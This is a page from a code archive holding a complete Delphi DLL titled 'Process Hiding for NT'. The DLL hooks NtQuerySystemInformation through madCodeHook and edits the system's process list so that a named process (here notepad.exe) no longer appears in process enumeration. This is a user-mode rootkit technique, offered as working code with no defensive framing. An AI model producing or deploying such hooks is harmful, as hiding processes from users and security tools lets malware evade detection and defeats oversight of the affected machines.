Mega Code Archive

 

Categories / Delphi / System

 

Hideprocessnt

{ Process Hiding for NT } library HookProcessEnumeration2; {$IMAGEBASE $57000000} uses Windows, SysUtils, madCodeHook; type PProcessInfo = ^TProcessInfo; TProcessInfo=record dwOffset : dword; // an ofset to the next Process structure dwThreadCount : dword; dwUnkown1 : array[0..5] of dword; ftCreationTime : TFileTime; dwUnkown2 : dword; dwUnkown3 : dword; dwUnkown4 : dword; dwUnkown5 : dword; dwUnkown6 : dword; pszProcessName : PWideChar; dwBasePriority : dword; dwProcessID : dword; dwParentProcessID : dword; dwHandleCount : dword; dwUnkown7 : dword; dwUnkown8 : dword; dwVirtualBytesPeak : dword; dwVirtualBytes : dword; dwPageFaults : dword; dwWorkingSetPeak : dword; dwWorkingSet : dword; dwUnkown9 : dword; dwPagedPool : dword; // kbytes dwUnkown10 : dword; dwNonPagedPool : dword; // kbytes dwPageFileBytesPeak : dword; dwPageFileBytes : dword; dwPrivateBytes : dword; dwUnkown11 : dword; dwUnkown12 : dword; dwUnkown13 : dword; dwUnkown14 : dword; ThreadInfo : PThreadInfo; // Thread list end; var NtQuerySystemInformationNextHook: function(dt : dword; buf : pointer; bufsize : dword; retlen : pointer) : dword; stdcall; function NtQuerySystemInformation(dt : dword; buf : pointer; bufsize : dword; retlen : pointer) : dword; stdcall;external 'ntdll.dll'; function NtQuerySystemInformationCallbackProc(dt : dword; buf : pointer; bufsize : dword; retlen : pointer) : dword; stdcall; type PBA = ^TBA; TBA = array[0..1000000] of byte; var tmpbuf: PBA; Pinfo,LastPinfo : PProcessInfo; cp: DWORD; curproc:string; begin Result := NtQuerySystemInformationNextHook(dt,buf,bufsize,retlen); if dt<>5 then exit; if result<>0 then exit; cp := 0; tmpbuf := buf; Repeat Pinfo := PProcessInfo(@tmpbuf[cp]); curproc:=WideCharToString(pinfo^.pszProcessName); if lowercase(curproc)='notepad.exe' then begin if pinfo^.dwOffset=0 then begin LastPinfo^.dwOffset:=0;exit;end else LastPinfo^.dwOffset:=LastPinfo^.dwOffset+pinfo.dwOffset; end else begin LastPinfo:=Pinfo; //I coded this part :P end; cp := cp + Pinfo^.dwOffset; until Pinfo^.dwOffset = 0; end; begin HookCode(@NtQuerySystemInformation, @NtQuerySystemInformationCallbackProc, @NtQuerySystemInformationNextHook); end.